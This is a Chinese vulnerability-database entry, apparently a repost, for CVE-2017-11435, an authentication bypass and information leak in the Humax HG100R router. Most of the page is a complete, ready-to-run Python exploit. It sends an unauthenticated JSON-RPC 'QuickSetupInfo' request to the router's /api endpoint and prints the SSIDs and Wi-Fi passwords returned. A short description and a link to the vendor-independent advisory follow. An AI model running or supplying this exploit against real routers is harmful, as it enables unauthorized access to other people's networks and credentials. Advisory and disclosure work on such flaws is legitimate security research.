文章目录[隐藏]
Humax Wi-Fi Router HG100R 安全漏洞
漏洞ID | 1124235 | 漏洞类型 | 信息泄露 |
发布时间 | 2017-09-14 | 更新时间 | 2021-06-28 |
CVE编号 | CVE-2017-11435 | CNNVD-ID | CNNVD-201707-914 |
漏洞平台 | Hardware | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
Humax Wi-Fi Router HG100R是韩国HUMAX(Humax)公司的一个路由器。 Humax Wi-Fi Router HG100R 2.0.6版本中存在信息泄露漏洞。攻击者可通过向管理控制台发送特制的请求利用该漏洞检索敏感信息(包括private/public IP地址、SSID名和密码)。
|漏洞EXP
# coding: utf-8
# Exploit Title: Humax HG100R-* Authentication Bypass
# Date: 14/09/2017
# Exploit Author: Kivson
# Vendor Homepage: http://humaxdigital.com
# Version: VER 2.0.6
# Tested on: OSX Linux
# CVE : CVE-2017-11435
# The Humax Wi-Fi Router model HG100R-* 2.0.6 is prone to an authentication bypass vulnerability via specially
# crafted requests to the management console. The bug is exploitable remotely when the router is configured to
# expose the management console.
# The router is not validating the session token while returning answers for some methods in url '/api'.
# An attacker can use this vulnerability to retrieve sensitive information such
# as private/public IP addresses, SSID names, and passwords.
import sys
import requests
def print_help():
print('Exploit syntax error, Example:')
print('python exploit.py http://192.168.0.1')
def exploit(host):
print(f'Connecting to {host}')
path = '/api'
payload = '{"method":"QuickSetupInfo","id":90,"jsonrpc":"2.0"}'
response = requests.post(host + path, data=payload)
response.raise_for_status()
if 'result' not in response.json() or 'WiFi_Info' not in response.json()['result'] or 'wlan' not in \
response.json()['result']['WiFi_Info']:
print('Error, target may be no exploitable')
return
for wlan in response.json()['result']['WiFi_Info']['wlan']:
print(f'Wifi data found:')
print(f' SSID: {wlan["ssid"]}')
print(f' PWD: {wlan["password"]}')
def main():
if len(sys.argv) < 2:
print_help()
return
host = sys.argv[1]
exploit(host)
if __name__ == '__main__':
main()
|参考资料
来源:MISC
链接:https://www.trustwave.com/Resources/Security-Advisories/Advisories/Multiple-Vulnerabilities-in-Humax-Routers/?fid=9700
本文由 华域联盟 原创撰写:华域联盟 » Humax Wi-Fi Router HG100R 安全漏洞
转载请保留出处和原文链接:https://www.cnhackhy.com/96351.htm